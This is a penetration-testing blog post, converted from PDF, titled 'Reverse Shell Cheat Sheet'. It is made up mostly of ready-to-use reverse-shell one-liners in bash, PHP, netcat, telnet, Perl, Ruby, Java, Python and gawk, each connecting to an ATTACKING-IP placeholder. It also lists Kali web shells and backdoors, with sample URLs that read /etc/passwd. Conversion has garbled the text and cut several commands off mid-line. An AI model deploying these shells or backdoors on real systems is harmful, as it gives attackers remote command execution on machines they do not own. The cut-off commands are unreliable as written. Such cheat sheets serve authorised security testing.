HOME BLOG

All Blog
Reverse Shell Cheat Sheet ∞ Cheat Sheets
Techniques
Security Hardening
CHEAT-SHEET 29 Mar 2015 Arr0way
WalkThroughs

During penetra on tes ng if you’re lucky CHEAT SHEETS

Table of Contents
enough to find a remote command Setup Listening Netcat
execu on vulnerability, you’ll more o en Bash Reverse Shells Penetra on Tes ng Tools

than not want to connect back to your Cheat Sheet

PHP Reverse Shell LFI Cheat Sheet
a acking machine to leverage an
Netcat Reverse Shell Vi Cheat Sheet
interac ve shell. Systemd Cheat Sheet
Telnet Reverse Shell
Reverse Shell Cheat
Below are a collec on of reverse shells Perl Reverse Shell Sheet
Perl Windows Reverse Shell nbtscan Cheat Sheet
that use commonly installed programming
Ruby Reverse Shell Nmap Cheat Sheet
languages, or commonly installed binaries
Linux Commands Cheat
(nc, telnet, bash, etc). At the bo om of Java Reverse Shell
Sheet

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 the post are a collec on of uploadable Python Reverse Shell More »

reverse shells, present in Kali Linux. Gawk Reverse Shell

WALKTHROUGHS
Kali Web Shells
If you found this resource usefull you Kali PHP Web Shells
InsomniHack CTF Teaser
should also check out our penetra on Kali Perl Reverse Shell - Smartcat2 Writeup
tes ng tools cheat sheet which has some Kali Cold Fusion Shell InsomniHack CTF Teaser
addi onal reverse shells and other - Smartcat1 Writeup
Kali ASP Shell Fris Leaks 1.3
commands useful when performing
Kali ASPX Shells Walkthrough
penetra on tes ng. SickOS 1.1 -
Kali JSP Reverse Shell
Walkthrough

Setup Listening Netcat The Wall Boot2Root

Walkthrough
More »
Your remote shell will need a listening netcat instance in order to connect
TECHNIQUES
back.

SSH & Meterpreter

★ Set your Netcat listening shell on an allowed port Pivo ng Techniques

More »
Use a port that is likely allowed via outbound rewall rules on the target network, e.g. 80 / 443

SECURITY HARDENING

To setup a listening netcat instance, enter the following: Security Harden CentOS
7
More »

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 /DEV/URANDOM
root@kali:~# nc -nvlp 80
nc: listening on :: 80 ...
MacBook - Post Install
nc: listening on 0.0.0.0 80 ...
Config + Apps
More »

ⓘ NAT requires a port forward

If you're attacking machine is behing a NAT router, you'll need to setup a port forward to the
OTHER BLOG

HowTo: Kali Linux

attacking machines IP / Port.
Chromium Install for
Web App Pen Tes ng
Jenkins RCE via
ATTACKING-IP is the machine running your listening netcat session, Unauthen cated API
port 80 is used in all examples below (for reasons men oned above). MacBook - Post Install
Config + Apps
enum4linux Cheat Sheet
Bash Reverse Shells Linux Local Enumera on
Script
HowTo Install Quassel on
exec /bin/bash 0&0 2>&0
Ubuntu
HowTo Install KeepNote
on OSX Mavericks
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done

# or:

while read line 0<&5; do $line 2>&5 >&5; done

bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

PHP Reverse Shell

A useful PHP reverse shell:

php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3

(Assumes TCP uses file descriptor 3. If it doesn't work, try 4,5, or

Netcat Reverse Shell

Useful netcat reverse shell examples:

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 nc -e /bin/sh ATTACKING-IP 80

/bin/sh | nc ATTACKING-IP 80

rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Telnet Reverse Shell

rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p

telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

Remember to listen on 443 on the a acking machine also.

Perl Reverse Shell

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_ST

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Perl Windows Reverse Shell

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");ST

perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_ST

Ruby Reverse Shell

ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprin

Java Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <
p.waitFor()

Python Reverse Shell

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INE

Gawk Reverse Shell

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 #!/usr/bin/gawk -f

BEGIN {
Port = 8080
Prompt = "bkd> "

Service = "/inet/tcp/" Port "/0/0"

while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}
}

Kali Web Shells

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 The following shells exist within Kali Linux, under
/usr/share/webshells/ these are only useful if you are able to upload,

inject or transfer the shell to the machine.

Kali PHP Web Shells

Kali PHP reverse shells and command shells:

COMMAND DESCRIPTION

/usr/share/webshells/php/
Pen Test Monkey - PHP Reverse Shell
php-reverse-shell.php

/usr/share/webshells/ Pen Test Monkey, Findsock Shell. Build

php/php-findsock-shell.php gcc -o findsock findsock.c (be mindfull of the
/usr/share/webshells/ target servers architecture), execute with netcat not a
php/findsock.c browser nc -v target 80

PHP backdoor, usefull for CMD execu on if upload /

/usr/share/webshells/ code injec on is possible, usage:
php/simple-backdoor.php http://target.com/simple-
backdoor.php?cmd=cat+/etc/passwd

/usr/share/webshells/ Larger PHP shell, with a text input box for command
php/php-backdoor.php execu on.

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 ★ Tip: Execu ng Reverse Shells
The last two shells above are not reverse shells, however they can be useful for executing a
reverse shell.

Kali Perl Reverse Shell

Kali perl reverse shell:

COMMAND DESCRIPTION

/usr/share/webshells/perl/
Pen Test Monkey - Perl Reverse Shell
perl-reverse-shell.pl

/usr/share/webshells/ Pen Test Monkey, Perl Shell. Usage:

perl/perlcmd.cgi http://target.com/perlcmd.cgi?cat /etc/passwd

Kali Cold Fusion Shell

Kali Coldfusion Shell:

COMMAND DESCRIPTION

/usr/share/webshells/cfm/cfexec.cfm Cold Fusion Shell - aka CFM Shell

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Kali ASP Shell

Classic ASP Reverse Shell + CMD shells:

COMMAND DESCRIPTION

/usr/share/webshells/asp/ Kali ASP Shells

Kali ASPX Shells

ASP.NET reverse shells within Kali:

COMMAND DESCRIPTION

/usr/share/webshells/aspx/ Kali ASPX Shells

Kali JSP Reverse Shell

Kali JSP Reverse Shell:

COMMAND DESCRIPTION

/usr/share/webshells/jsp/jsp-reverse.jsp Kali JSP Reverse Shell

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 Share this on...
 Twi er  Facebook  Google+  Reddit

Follow Arr0way
 Twi er  GitHub

Also...

You might want to read these

CATEGORY POST NAME

cheat-sheet Penetration Testing Tools Cheat Sheet

cheat-sheet LFI Cheat Sheet

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD
 kali linux HowTo: Kali Linux Chromium Install for Web App Pen Testing

walkthroughs InsomniHack CTF Teaser - Smartcat2 Writeup

walkthroughs InsomniHack CTF Teaser - Smartcat1 Writeup

walkthroughs FristiLeaks 1.3 Walkthrough

walkthroughs SickOS 1.1 - Walkthrough

walkthroughs The Wall Boot2Root Walkthrough

walkthroughs /dev/random: Sleepy Walkthrough CTF

walkthroughs /dev/random Pipe walkthrough

The contents of this website are © 2018

Proudly hosted by
HighOn.Coffee

Create PDF in your applications with the Pdfcrowd HTML to PDF API PDFCROWD